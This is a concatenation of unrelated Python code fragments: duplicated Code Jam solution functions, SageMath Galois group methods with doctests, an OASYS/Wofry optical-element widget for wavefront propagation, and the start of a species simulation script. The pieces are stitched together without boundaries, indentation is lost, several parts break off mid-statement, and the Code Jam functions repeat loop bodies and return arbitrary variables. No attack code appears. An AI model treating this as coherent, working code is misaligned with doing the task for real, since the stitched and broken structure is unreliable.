T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return N
def func_7a1ced1d999d45729628f9914c8dc9a8():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return a
def func_5c85d4feecc64c9cbbafcefb97477778():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
        for i in xrange(1, N):
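# The functions above rely on two helpers, line() and getsum(), that are not
# shown in this excerpt. The definitions below are an illustrative guess,
# consistent with how the helpers are used (line() parses a whitespace-
# separated record of integers; getsum() returns the sum of A over a segment
# using the prefix sums in totalsum); the original implementations may differ.
def line(infile):
    # Parse one line of the input file into a tuple of integers.
    return tuple(int(tok) for tok in infile.readline().split())

def getsum(a, b, total, totalsum):
    # Sum of A over the circular segment from index a+1 to b (inclusive),
    # assuming totalsum[i] = A[0] + ... + A[i].
    if a <= b:
        return totalsum[b] - totalsum[a]
    return total - (totalsum[a] - totalsum[b])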
``self``.
INPUT:
- ``i`` -- integer between ``0`` and ``n-1`` where
``n`` is the cardinality of this set
EXAMPLES::
sage: G = NumberField(x^3 - 3*x + 1,'a').galois_group()
sage: [G.unrank(i) for i in range(G.cardinality())]
[(), (1,2,3), (1,3,2)]
TESTS::
sage: G = NumberField(x^3 - 3*x + 1,'a').galois_group()
sage: L = [G.unrank(i) for i in range(G.cardinality())]
sage: L == G.list()
True
"""
return self._elts[i]
def __iter__(self):
"""
Iterate over ``self``.
EXAMPLES::
sage: G = NumberField(x^3 - 3*x + 1,'a').galois_group()
sage: list(G) == G.list()
True
"""
return iter(self._elts)
def subgroup(self, elts):
r"""
Return the subgroup of self with the given elements. Mostly for internal use.
EXAMPLES::
sage: G = NumberField(x^3 - x - 1, 'a').galois_closure('b').galois_group()
sage: G.subgroup([ G(1), G([(1,2,3),(4,5,6)]), G([(1,3,2),(4,6,5)]) ])
Subgroup [(), (1,2,3)(4,5,6), (1,3,2)(4,6,5)] of Galois group of Number Field in b with defining polynomial x^6 - 6*x^4 + 9*x^2 + 23
"""
if len(elts) == self.order():
return self
else:
return GaloisGroup_subgroup(self, elts)
# Proper number theory starts here. All the functions below make no sense
# unless the field is Galois.
def decomposition_group(self, P):
r"""
Decomposition group of a prime ideal P, i.e. the subgroup of elements
that map P to itself. This is the same as the Galois group of the
extension of local fields obtained by completing at P.
This function will raise an error if P is not prime or the given number
field is not Galois.
P can also be an infinite prime, i.e. an embedding into `\RR` or `\CC`.
EXAMPLES::
sage: K.<a> = NumberField(x^4 - 2*x^2 + 2,'b').galois_closure()
sage: P = K.ideal([17, a^2])
sage: G = K.galois_group()
sage: G.decomposition_group(P)
Subgroup [(), (1,8)(2,7)(3,6)(4,5)] of Galois group of Number Field in a with defining polynomial x^8 - 20*x^6 + 104*x^4 - 40*x^2 + 1156
sage: G.decomposition_group(P^2)
Traceback (most recent call last):
...
ValueError: Fractional ideal (...) is not prime
sage: G.decomposition_group(17)
Traceback (most recent call last):
...
ValueError: Fractional ideal (17) is not prime
An example with an infinite place::
sage: L.<b> = NumberField(x^3 - 2,'a').galois_closure(); G=L.galois_group()
sage: x = L.places()[0]
sage: G.decomposition_group(x).order()
2
"""
if not self.is_galois():
raise TypeError("Decomposition groups only defined for Galois extensions")
if isinstance(P, NumberFieldHomomorphism_im_gens):
if self.number_field().is_totally_real():
return self.subgroup([self.identity()])
else:
return self.subgroup([self.identity(), self.complex_conjugation(P)])
else:
P = self.number_field().ideal_monoid()(P)
if not P.is_prime():
raise ValueError("%s is not prime" % P)
return self.subgroup([s for s in self if s(P) == P])
def complex_conjugation(self, P=None):
"""
Return the unique element of self corresponding to complex conjugation,
for a specified embedding P into the complex numbers. If P is not
specified, use the "standard" embedding, whenever that is well-defined.
EXAMPLES::
sage: L.<z> = CyclotomicField(7)
sage: G = L.galois_group()
sage: conj = G.complex_conjugation(); conj
(1,4)(2,5)(3,6)
sage: conj(z)
-z^5 - z^4 - z^3 - z^2 - z - 1
An example where the field is not CM, so complex conjugation really
depends on the choice of embedding::
sage: L = NumberField(x^6 + 40*x^3 + 1372,'a')
sage: G = L.galois_group()
sage: [G.complex_conjugation(x) for x in L.places()]
[(1,3)(2,6)(4,5), (1,5)(2,4)(3,6), (1,2)(3,4)(5,6)]
"""
if P is None:
Q = self.number_field().specified_complex_embedding()
if Q is None:
raise ValueError("No default complex embedding specified")
P = Q
P = refine_embedding(P, infinity)
if not self.number_field().is_galois():
raise TypeError("Extension is not Galois")
if self.number_field().is_totally_real():
raise TypeError("No complex conjugation (field is real)")
g = self.number_field().gen()
gconj = P(g).conjugate()
elts = [s for s in self if P(s(g)) == gconj]
if len(elts) != 1:
raise ArithmeticError("Something has gone very wrong here")
return elts[0]
def ramification_group(self, P, v):
"""
Return the vth ramification group of self for the prime P, i.e. the set
of elements s of self such that s acts trivially modulo P^(v+1). This
is only defined for Galois fields.
EXAMPLES::
sage: K.<b> = NumberField(x^3 - 3,'a').galois_closure()
sage: G=K.galois_group()
sage: P = K.primes_above(3)[0]
sage: G.ramification_group(P, 3)
Subgroup [(), (1,2,4)(3,5,6), (1,4,2)(3,6,5)] of Galois group of Number Field in b with defining polynomial x^6 + 243
sage: G.ramification_group(P, 5)
Subgroup [()] of Galois group of Number Field in b with defining polynomial x^6 + 243
"""
if not self.is_galois():
raise TypeError("Ramification groups only defined for Galois extensions")
P = self.number_field().ideal_monoid()(P)
if not P.is_prime():
raise ValueError("%s is not prime")
return self.subgroup([g for g in self if g(P) == P and g.ramification_degree(P) >= v + 1])
def inertia_group(self, P):
"""
Return the inertia group of the prime P, i.e. the group of elements acting
trivially modulo P. This is just the 0th ramification group of P.
EXAMPLES::
sage: K.<b> = NumberField(x^2 - 3,'a')
sage: G = K.galois_group()
sage: G.inertia_group(K.primes_above(2)[0])
Galois group of Number Field in b with defining polynomial x^2 - 3
sage: G.inertia_group(K.primes_above(5)[0])
Subgroup [()] of Galois group of Number Field in b with defining polynomial x^2 - 3
"""
if not self.is_galois():
raise TypeError("Inertia groups only defined for Galois extensions")
return self.ramification_group(P, 0)
def ramification_breaks(self, P):
r"""
Return the set of ramification breaks of the prime ideal P, i.e. the
set of indices i such that the ramification group `G_{i+1} \ne G_{i}`.
This is only defined for Galois fields.
EXAMPLES::
sage: K.<b> = NumberField(x^8 - 20*x^6 + 104*x^4 - 40*x^2 + 1156)
sage: G = K.galois_group()
sage: P = K.primes_above(2)[0]
sage: G.ramification_breaks(P)
{1, 3, 5}
sage: min( [ G.ramification_group(P, i).order() / G.ramification_group(P, i+1).order() for i in G.ramification_breaks(P)] )
2
"""
if not self.is_galois():
raise TypeError("Ramification breaks only defined for Galois extensions")
from sage.rings.infinity import infinity
from sage.sets.set import Set
i = [g.ramification_degree(P) - 1 for g in self.decomposition_group(P)]
i.remove(infinity)
return Set(i)
def artin_symbol(self, P):
r"""
Return the Artin symbol `\left(\frac{K /
\QQ}{\mathfrak{P}}\right)`, where K is the number field of self,
and `\mathfrak{P}` is an unramified prime ideal. This is the unique
element s of the decomposition group of `\mathfrak{P}` such that `s(x) = x^p \bmod
\mathfrak{P}`, where p is the residue characteristic of `\mathfrak{P}`.
EXAMPLES::
sage: K.<b> = NumberField(x^4 - 2*x^2 + 2, 'a').galois_closure()
sage: G = K.galois_group()
sage: [G.artin_symbol(P) for P in K.primes_above(7)]
[(1,5)(2,6)(3,7)(4,8), (1,5)(2,6)(3,7)(4,8), (1,4)(2,3)(5,8)(6,7), (1,4)(2,3)(5,8)(6,7)]
sage: G.artin_symbol(17)
Traceback (most recent call last):
...
ValueError: Fractional ideal (17) is not prime
sage: QuadraticField(-7,'c').galois_group().artin_symbol(13)
(1,2)
sage: G.artin_symbol(K.primes_above(2)[0])
Traceback (most recent call last):
...
ValueError: Fractional ideal (...) is ramified
"""
if not self.is_galois():
raise TypeError("Artin symbols only defined for Galois extensions")
P = self.number_field().ideal_monoid()(P)
if not P.is_prime():
raise ValueError("%s is not prime" % P)
p = P.smallest_integer()
t = []
gens = self.number_field().ring_of_integers().ring_generators()
for s in self.decomposition_group(P):
w = [(s(g) - g**p).valuation(P) for g in gens]
if min(w) >= 1:
t.append(s)
if len(t) > 1:
raise ValueError("%s is ramified" % P)
return t[0]
class GaloisGroup_subgroup(GaloisGroup_v2):
r"""
A subgroup of a Galois group, as returned by functions such as ``decomposition_group``.
"""
def __init__(self, ambient, elts):
r"""
Create a subgroup of a Galois group with the given elements. It is generally better to
use the subgroup() method of the parent group.
EXAMPLES::
sage: from sage.rings.number_field.galois_group import GaloisGroup_subgroup
sage: G = NumberField(x^3 - x - 1, 'a').galois_closure('b').galois_group()
sage: GaloisGroup_subgroup( G, [ G(1), G([(1,2,3),(4,5,6)]), G([(1,3,2),(4,6,5)])])
Subgroup [(), (1,2,3)(4,5,6), (1,3,2)(4,6,5)] of Galois group of Number Field in b with defining polynomial x^6 - 6*x^4 + 9*x^2 + 23
TESTS:
Check that :trac:`17664` is fixed::
sage: L.<c> = QuadraticField(-1)
sage: P = L.primes_above(5)[0]
sage: G = L.galois_group()
sage: H = G.decomposition_group(P)
sage: H.domain()
{1, 2}
sage: G.artin_symbol(P)
()
"""
# XXX This should be fixed so that this can use GaloisGroup_v2.__init__
PermutationGroup_generic.__init__(self, elts, canonicalize=True,
domain=ambient.domain())
self._ambient = ambient
self._number_field = ambient.number_field()
self._galois_closure = ambient._galois_closure
self._pari_data = ambient._pari_data
self._pari_gc = ambient._pari_gc
self._gc_map = ambient._gc_map
self._elts = elts
def fixed_field(self):
r"""
Return the fixed field of this subgroup (as a subfield of the Galois
closure of the number field associated to the ambient Galois group).
EXAMPLES::
sage: L.<a> = NumberField(x^4 + 1)
sage: G = L.galois_group()
sage: H = G.decomposition_group(L.primes_above(3)[0])
sage: H.fixed_field()
(Number Field in a0 with defining polynomial x^2 + 2, Ring morphism:
From: Number Field in a0 with defining polynomial x^2 + 2
import numpy, sys
from PyQt5.QtGui import QPalette, QColor, QFont
from PyQt5.QtWidgets import QMessageBox
from orangewidget import gui
from orangewidget import widget
from orangewidget.settings import Setting
from oasys.widgets import gui as oasysgui
from oasys.widgets import congruence
from oasys.widgets.gui import ConfirmDialog
from oasys.util.oasys_util import EmittingStream, TriggerIn
from syned.widget.widget_decorator import WidgetDecorator
from syned.beamline.element_coordinates import ElementCoordinates
from syned.beamline.beamline_element import BeamlineElement
from syned.beamline.shape import *
from wofry.propagator.propagator import PropagationManager, PropagationElements, PropagationParameters
from wofryimpl.propagator.propagators1D.fresnel import Fresnel1D
from wofryimpl.propagator.propagators1D.fresnel_convolution import FresnelConvolution1D
from wofryimpl.propagator.propagators1D.fraunhofer import Fraunhofer1D
from wofryimpl.propagator.propagators1D.integral import Integral1D
from wofryimpl.propagator.propagators1D.fresnel_zoom import FresnelZoom1D
from wofryimpl.propagator.propagators1D.fresnel_zoom_scaling_theorem import FresnelZoomScaling1D
from orangecontrib.wofry.util.wofry_objects import WofryData
from orangecontrib.wofry.widgets.gui.ow_wofry_widget import WofryWidget
def initialize_default_propagator_1D():
propagator = PropagationManager.Instance()
propagator.add_propagator(Fraunhofer1D())
propagator.add_propagator(Fresnel1D())
propagator.add_propagator(FresnelConvolution1D())
propagator.add_propagator(Integral1D())
propagator.add_propagator(FresnelZoom1D())
propagator.add_propagator(FresnelZoomScaling1D())
try:
initialize_default_propagator_1D()
except:
pass
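# Illustrative sketch (not part of the original module): once the 1D
# propagators above are registered, a propagation is dispatched by handler
# name through the singleton manager, mirroring what propagate_wavefront()
# does further down. `input_wavefront` and `beamline_element` are placeholder
# arguments for objects built elsewhere.
def _propagation_usage_sketch(input_wavefront, beamline_element):
    propagation_elements = PropagationElements()
    propagation_elements.add_beamline_element(beamline_element)
    parameters = PropagationParameters(wavefront=input_wavefront.duplicate(),
                                       propagation_elements=propagation_elements)
    return PropagationManager.Instance().do_propagation(
        propagation_parameters=parameters,
        handler_name=FresnelZoom1D.HANDLER_NAME)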
class OWWOOpticalElement1D(WofryWidget, WidgetDecorator):
maintainer = "<NAME>"
maintainer_email = "<EMAIL>(<EMAIL>"
keywords = ["data", "file", "load", "read"]
category = "Wofry Optical Elements"
outputs = [{"name":"WofryData",
"type":WofryData,
"doc":"WofryData",
"id":"WofryData"},
{"name":"Trigger",
"type": TriggerIn,
"doc":"Feedback signal to start a new beam simulation",
"id":"Trigger"},
]
inputs = [("WofryData", WofryData, "set_input"),
WidgetDecorator.syned_input_data()[0]]
oe_name = Setting("")
p = Setting(0.0)
q = Setting(0.0)
angle_radial = Setting(0.0)
angle_azimuthal = Setting(0.0)
shape = Setting(0)
surface_shape = Setting(0)
input_data = None
wavefront_to_plot = None
propagators_list = ["Fresnel", "Fresnel (Convolution)", "Fraunhofer", "Integral", "Fresnel Zoom","Fresnel Zoom Scaled"]
# plot_titles = ["Wavefront 1D Intensity", "Wavefront 1D Phase","Wavefront Real(Amplitude)","Wavefront Imag(Amplitude)"]
propagator = Setting(4)
magnification_x = Setting(1.0) # For Fresnel Zoom & Integral
magnification_N = Setting(1.0) # For Integral
scaled_guess_R = Setting(True) # For Fresnel Zoom Scaled
scaled_R = Setting(1000.0) # For Fresnel Zoom Scaled
scaled_Rmax = Setting(100.0) # For Fresnel Zoom Scaled
scaled_N = Setting(100) # For Fresnel Zoom Scaled
wavefront_radius = 1.0
def __init__(self,is_automatic=True, show_view_options=True, show_script_tab=True):
super().__init__(is_automatic=is_automatic, show_view_options=show_view_options, show_script_tab=show_script_tab)
self.runaction = widget.OWAction("Propagate Wavefront", self)
self.runaction.triggered.connect(self.propagate_wavefront)
self.addAction(self.runaction)
button_box = oasysgui.widgetBox(self.controlArea, "", addSpace=False, orientation="horizontal")
button = gui.button(button_box, self, "Propagate Wavefront", callback=self.propagate_wavefront)
font = QFont(button.font())
font.setBold(True)
button.setFont(font)
palette = QPalette(button.palette()) # make a copy of the palette
palette.setColor(QPalette.ButtonText, QColor('Dark Blue'))
button.setPalette(palette) # assign new palette
button.setFixedHeight(45)
button = gui.button(button_box, self, "Reset Fields", callback=self.callResetSettings)
font = QFont(button.font())
font.setItalic(True)
button.setFont(font)
palette = QPalette(button.palette()) # make a copy of the palette
palette.setColor(QPalette.ButtonText, QColor('Dark Red'))
button.setPalette(palette) # assign new palette
button.setFixedHeight(45)
button.setFixedWidth(150)
gui.separator(self.controlArea)
self.tabs_setting = oasysgui.tabWidget(self.controlArea)
self.tabs_setting.setFixedHeight(self.TABS_AREA_HEIGHT)
self.tabs_setting.setFixedWidth(self.CONTROL_AREA_WIDTH-5)
self.tab_bas = oasysgui.createTabPage(self.tabs_setting, "O.E. Setting")
oasysgui.lineEdit(self.tab_bas, self, "oe_name", "O.E. Name", labelWidth=260, valueType=str, orientation="horizontal")
self.coordinates_box = oasysgui.widgetBox(self.tab_bas, "Coordinates", addSpace=True, orientation="vertical")
tmp = oasysgui.lineEdit(self.coordinates_box, self, "p", "Distance from previous Continuation Plane [m]", labelWidth=280, valueType=float, orientation="horizontal")
tmp.setToolTip("p")
tmp = oasysgui.lineEdit(self.coordinates_box, self, "q", "Distance to next Continuation Plane [m]", labelWidth=280, valueType=float, orientation="horizontal")
tmp.setToolTip("q")
# Commented srio (not yet implemented) TODO: implement it!
# oasysgui.lineEdit(self.coordinates_box, self, "angle_radial", "Incident Angle (to normal) [deg]", labelWidth=280, valueType=float, orientation="horizontal")
# oasysgui.lineEdit(self.coordinates_box, self, "angle_azimuthal", "Rotation along Beam Axis [deg]", labelWidth=280, valueType=float, orientation="horizontal")
self.draw_specific_box()
self.create_propagation_setting_tab()
def create_propagation_setting_tab(self):
self.tab_pro = oasysgui.createTabPage(self.tabs_setting, "Propagation Setting")
gui.comboBox(self.tab_pro, self, "propagator", label="Propagator", labelWidth=260,
items=self.propagators_list,
callback=self.set_Propagator,
sendSelectedValue=False, orientation="horizontal")
# Fresnel
self.fresnel_box = oasysgui.widgetBox(self.tab_pro, "", addSpace=False, orientation="vertical", height=90)
        # Fraunhofer
self.fraunhofer_box = oasysgui.widgetBox(self.tab_pro, "", addSpace=False, orientation="vertical", height=90)
# Integral
self.integral_box = oasysgui.widgetBox(self.tab_pro, "", addSpace=False, orientation="vertical", height=90)
tmp = oasysgui.lineEdit(self.integral_box, self, "magnification_x", "Magnification Factor for interval",
labelWidth=260, valueType=float, orientation="horizontal")
tmp.setToolTip("magnification_x")
tmp = oasysgui.lineEdit(self.integral_box, self, "magnification_N", "Magnification Factor for N points",
labelWidth=260, valueType=float, orientation="horizontal")
tmp.setToolTip("magnification_N")
# Fresnel zoom
self.zoom_box = oasysgui.widgetBox(self.tab_pro, "", addSpace=False, orientation="vertical", height=90)
tmp = oasysgui.lineEdit(self.zoom_box, self, "magnification_x", "Magnification Factor for interval",
labelWidth=260, valueType=float, orientation="horizontal")
tmp.setToolTip("magnification_x")
        # Fresnel Scaled zoom
self.zoom_scaled_box = oasysgui.widgetBox(self.tab_pro, "", addSpace=False, orientation="vertical")
tmp = oasysgui.lineEdit(self.zoom_scaled_box, self, "magnification_x", "Magnification Factor for interval",
labelWidth=260, valueType=float, orientation="horizontal")
tmp.setToolTip("magnification_x")
gui.comboBox(self.zoom_scaled_box, self, "scaled_guess_R", label="Guess wavefront curvature", labelWidth=260,
items=["No","Yes"],
callback=self.set_ScaledGuess,
sendSelectedValue=False, orientation="horizontal")
self.zoom_scaled_box_1 = oasysgui.widgetBox(self.zoom_scaled_box, "", addSpace=False, orientation="vertical", height=90)
self.zoom_scaled_box_2 = oasysgui.widgetBox(self.zoom_scaled_box, "", addSpace=False, orientation="vertical", height=90)
oasysgui.lineEdit(self.zoom_scaled_box_1, self, "scaled_R", "Wavefront radius of curvature",
labelWidth=260, valueType=float, orientation="horizontal")
oasysgui.lineEdit(self.zoom_scaled_box_2, self, "scaled_Rmax", "Maximum wavefront radius of curvature",
labelWidth=260, valueType=float, orientation="horizontal")
oasysgui.lineEdit(self.zoom_scaled_box_2, self, "scaled_N", "Number of points for guessing curvature",
labelWidth=260, valueType=int, orientation="horizontal")
self.set_Propagator()
def set_Propagator(self):
self.fresnel_box.setVisible(self.propagator <= 1)
self.fraunhofer_box.setVisible(self.propagator == 2)
self.integral_box.setVisible(self.propagator == 3)
self.zoom_box.setVisible(self.propagator == 4)
self.zoom_scaled_box.setVisible(self.propagator == 5)
if self.propagator == 5: self.set_ScaledGuess()
def set_ScaledGuess(self):
self.zoom_scaled_box_1.setVisible(self.scaled_guess_R==0)
self.zoom_scaled_box_2.setVisible(self.scaled_guess_R==1)
def draw_specific_box(self):
pass
def check_data(self):
congruence.checkNumber(self.p, "Distance from previous Continuation Plane")
congruence.checkNumber(self.q, "Distance to next Continuation Plane")
congruence.checkAngle(self.angle_radial, "Incident Angle (to normal)")
congruence.checkAngle(self.angle_azimuthal, "Rotation along Beam Axis")
def propagate_wavefront(self):
self.progressBarInit()
self.wofry_output.setText("")
sys.stdout = EmittingStream(textWritten=self.writeStdOut)
if self.input_data is None: raise Exception("No Input Data")
self.check_data()
# propagation to o.e.
input_wavefront = self.input_data.get_wavefront()
beamline = self.input_data.get_beamline().duplicate()
optical_element = self.get_optical_element()
optical_element.name = self.oe_name if not self.oe_name is None else self.windowTitle()
beamline_element = BeamlineElement(optical_element=optical_element,
coordinates=ElementCoordinates(p=self.p,
q=self.q,
angle_radial=numpy.radians(self.angle_radial),
angle_azimuthal=numpy.radians(self.angle_azimuthal)))
#
# this will store the propagation parameters in beamline in order to perform the propagation in the script
#
# 1D
# ==
#
# propagators_list = ["Fresnel", "Fresnel (Convolution)", "Fraunhofer", "Integral", "Fresnel Zoom", "Fresnel Zoom Scaled"]
# class_name = ["Fresnel1D", "FresnelConvolution1D", "Fraunhofer1D", "Integral1D", "FresnelZoom1D", "FresnelZoomScaling1D"]
# handler_name = ["FRESNEL_1D", "FRESNEL_CONVOLUTION_1D", "FRAUNHOFER_1D", "INTEGRAL_1D", "FRESNEL_ZOOM_1D", "FRESNEL_ZOOM_SCALING_1D"]
if self.propagator == 0:
propagator_info = {
"propagator_class_name": "Fresnel",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": [],
"propagator_additional_parameters_values": []}
elif self.propagator == 1:
propagator_info = {
"propagator_class_name": "FresnelConvolution1D",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": [],
"propagator_additional_parameters_values": []}
elif self.propagator == 2:
propagator_info = {
"propagator_class_name": "Fraunhofer1D",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": [],
"propagator_additional_parameters_values": []}
elif self.propagator == 3:
propagator_info = {
"propagator_class_name": "Integral1D",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": ['magnification_x', 'magnification_N'],
"propagator_additional_parameters_values": [self.magnification_x, self.magnification_N]}
elif self.propagator == 4:
propagator_info = {
"propagator_class_name": "FresnelZoom1D",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": ['magnification_x'],
"propagator_additional_parameters_values": [self.magnification_x]}
elif self.propagator == 5:
propagator_info = {
"propagator_class_name": "FresnelZoomScaling1D",
"propagator_handler_name": self.get_handler_name(),
"propagator_additional_parameters_names": ['magnification_x','radius'],
"propagator_additional_parameters_values": [self.magnification_x, self.wavefront_radius]}
beamline.append_beamline_element(beamline_element, propagator_info)
propagation_elements = PropagationElements()
propagation_elements.add_beamline_element(beamline_element)
propagation_parameters = PropagationParameters(wavefront=input_wavefront.duplicate(),
propagation_elements=propagation_elements)
self.set_additional_parameters(propagation_parameters)
self.setStatusMessage("Begin Propagation")
propagator = PropagationManager.Instance()
output_wavefront = propagator.do_propagation(propagation_parameters=propagation_parameters,
handler_name=self.get_handler_name())
self.setStatusMessage("Propagation Completed")
self.wavefront_to_plot = output_wavefront
if self.view_type > 0:
self.initializeTabs()
self.do_plot_results()
else:
self.progressBarFinished()
self.send("WofryData", WofryData(beamline=beamline, wavefront=output_wavefront))
self.send("Trigger", TriggerIn(new_object=True))
# try:
if True:
self.wofry_python_script.set_code(beamline.to_python_code())
# except:
# pass
self.setStatusMessage("")
try:
self.print_intensities()
except:
pass
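    # Hedged, illustrative alternative (not part of the original widget): the
    # if/elif chain in propagate_wavefront() could be table-driven. The class
    # names come from the comment block in that method; everything else here
    # is an assumption, kept only as a sketch.
    def _propagator_info_sketch(self):
        class_names = ["Fresnel1D", "FresnelConvolution1D", "Fraunhofer1D",
                       "Integral1D", "FresnelZoom1D", "FresnelZoomScaling1D"]
        extra = {3: (['magnification_x', 'magnification_N'],
                     [self.magnification_x, self.magnification_N]),
                 4: (['magnification_x'], [self.magnification_x]),
                 5: (['magnification_x', 'radius'],
                     [self.magnification_x, self.wavefront_radius])}
        names, values = extra.get(self.propagator, ([], []))
        return {"propagator_class_name": class_names[self.propagator],
                "propagator_handler_name": self.get_handler_name(),
                "propagator_additional_parameters_names": names,
                "propagator_additional_parameters_values": values}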
def print_intensities(self):
input_wavefront = self.input_data.get_wavefront()
output_wavefront = self.wavefront_to_plot
c1 = input_wavefront.get_intensity().sum()
c2 = output_wavefront.get_intensity().sum()
d1 = input_wavefront.delta()
d2 = output_wavefront.delta()
i1 = c1 * d1
i2 = c2 * d2
print("\n\n\n ========== integrated intensities: ")
print("input wavefront integrated intensity: %g, counts: %g" % (i1, c1))
print("output wavefront integrated intensity: %g, counts: %g" % (i2, c2))
print("output/input intensity ratio (transmission): %g " % (i2 / i1))
print("(input-output)/input intensity ratio (absorption): %g " % ((i1 - i2) / i1))
print("abscissas step in: %g um, out: %g um" % (1e6 * d1, 1e6 * d2))
def get_handler_name(self):
if self.propagator == 0:
return Fresnel1D.HANDLER_NAME
elif self.propagator == 1:
return FresnelConvolution1D.HANDLER_NAME
elif self.propagator == 2:
return Fraunhofer1D.HANDLER_NAME
elif self.propagator == 3:
return Integral1D.HANDLER_NAME
elif self.propagator == 4:
return FresnelZoom1D.HANDLER_NAME
elif self.propagator == 5:
return FresnelZoomScaling1D.HANDLER_NAME
def set_additional_parameters(self, propagation_parameters):
if self.propagator <= 2:
pass
elif self.propagator == 3:
propagation_parameters.set_additional_parameters("magnification_x", self.magnification_x)
propagation_parameters.set_additional_parameters("magnification_N", self.magnification_N)
elif self.propagator == 4:
propagation_parameters.set_additional_parameters("magnification_x", self.magnification_x)
elif self.propagator == 5:
propagation_parameters.set_additional_parameters("magnification_x", self.magnification_x)
if self.scaled_guess_R:
# from srxraylib.plot.gol import plot
# radii,fig_of_mer = self.input_wavefront.scan_wavefront_curvature(
# rmin=-self.scaled_Rmax,rmax=self.scaled_Rmax,rpoints=self.scaled_N)
# plot(radii,fig_of_mer)
self.wavefront_radius = self.input_data.get_wavefront().guess_wavefront_curvature(
rmin=-self.scaled_Rmax,rmax=self.scaled_Rmax,rpoints=self.scaled_N)
print("Guess wavefront curvature radius: %f m " % self.wavefront_radius)
else:
self.wavefront_radius = self.scaled_R
propagation_parameters.set_additional_parameters("radius", self.wavefront_radius)
def get_optical_element(self):
raise NotImplementedError()
def set_input(self, wofry_data):
if not wofry_data is None:
if isinstance(wofry_data, WofryData):
self.input_data = wofry_data
else:
raise Exception("Only wofry_data allowed as input")
if self.is_automatic_execution:
self.propagate_wavefront()
def get_titles(self):
return ["Wavefront 1D Intensity",
"Wavefront 1D Phase",
"Wavefront Real(Amplitude)",
"Wavefront Imag(Amplitude)"]
def initializeTabs(self):
size = len(self.tab)
indexes = range(0, size)
for index in indexes:
self.tabs.removeTab(size-1-index)
self.tab = []
self.plot_canvas = []
for index in range(0, len(self.get_titles())):
self.tab.append(gui.createTabPage(self.tabs, self.get_titles()[index]))
self.plot_canvas.append(None)
for tab in self.tab:
tab.setFixedHeight(self.IMAGE_HEIGHT)
tab.setFixedWidth(self.IMAGE_WIDTH)
def do_plot_results(self, progressBarValue=80, closeProgressBar=True):
if not self.wavefront_to_plot is None:
self.progressBarSet(progressBarValue)
self.plot_data1D(x=1e6*self.wavefront_to_plot.get_abscissas(),
y=self.wavefront_to_plot.get_intensity(),
progressBarValue=progressBarValue,
tabs_canvas_index=0,
plot_canvas_index=0,
title=self.get_titles()[0],
xtitle="Spatial Coordinate [$\mu$m]",
ytitle="Intensity")
self.plot_data1D(x=1e6*self.wavefront_to_plot.get_abscissas(),
y=self.wavefront_to_plot.get_phase(from_minimum_intensity=0.1,unwrap=1),
progressBarValue=progressBarValue + 10,
tabs_canvas_index=1,
plot_canvas_index=1,
title=self.get_titles()[1],
xtitle="Spatial Coordinate [$\mu$m]",
ytitle="Phase [unwrapped, for intensity > 10% of peak] (rad)")
self.plot_data1D(x=1e6*self.wavefront_to_plot.get_abscissas(),
y=numpy.real(self.wavefront_to_plot.get_complex_amplitude()),
progressBarValue=progressBarValue + 10,
tabs_canvas_index=2,
plot_canvas_index=2,
title=self.get_titles()[2],
xtitle="Spatial Coordinate [$\mu$m]",
ytitle="Real(Amplitude)")
self.plot_data1D(x=1e6*self.wavefront_to_plot.get_abscissas(),
y=numpy.imag(self.wavefront_to_plot.get_complex_amplitude()),
progressBarValue=progressBarValue + 10,
tabs_canvas_index=3,
plot_canvas_index=3,
title=self.get_titles()[3],
xtitle="Spatial Coordinate [$\mu$m]",
ytitle="Imag(Amplitude)")
# for i in range(len(self.get_titles())):
# self.plot_canvas[i].resetZoom()
if closeProgressBar: self.progressBarFinished()
def receive_syned_data(self, data):
if not data is None:
beamline_element = data.get_beamline_element_at(-1)
if not beamline_element is None:
self.oe_name = beamline_element._optical_element._name
self.p = beamline_element._coordinates._p
self.q = beamline_element._coordinates._q
self.angle_azimuthal = round(numpy.degrees(beamline_element._coordinates._angle_azimuthal), 6)
self.angle_radial = round(numpy.degrees(beamline_element._coordinates._angle_radial), 6)
self.receive_specific_syned_data(beamline_element._optical_element)
else:
raise Exception("Syned Data not correct: Empty Beamline Element")
def receive_specific_syned_data(self, optical_element):
raise NotImplementedError()
def callResetSettings(self):
if ConfirmDialog.confirmed(parent=self, message="Confirm Reset of the Fields?"):
#!/usr/bin/python
# unorganized_code/two_species.py
import argparse
import datetime
import os
import subprocess
import numpy as np
from simulation_parameters import DefineRegion
class SharedCommands(object):
def __init__(self, n_initial, record):
self.n_initial = n_initial
self.record = record
def initialize(self, f):
for key, value in self.n_initial.items():
f.write("new {0} at {1}\n".format(key, value))
def record_species(self, f):
for item in self.record:
f.write("record {0}\n".format(item))
f.write("\n")
def compile_script(script_name):
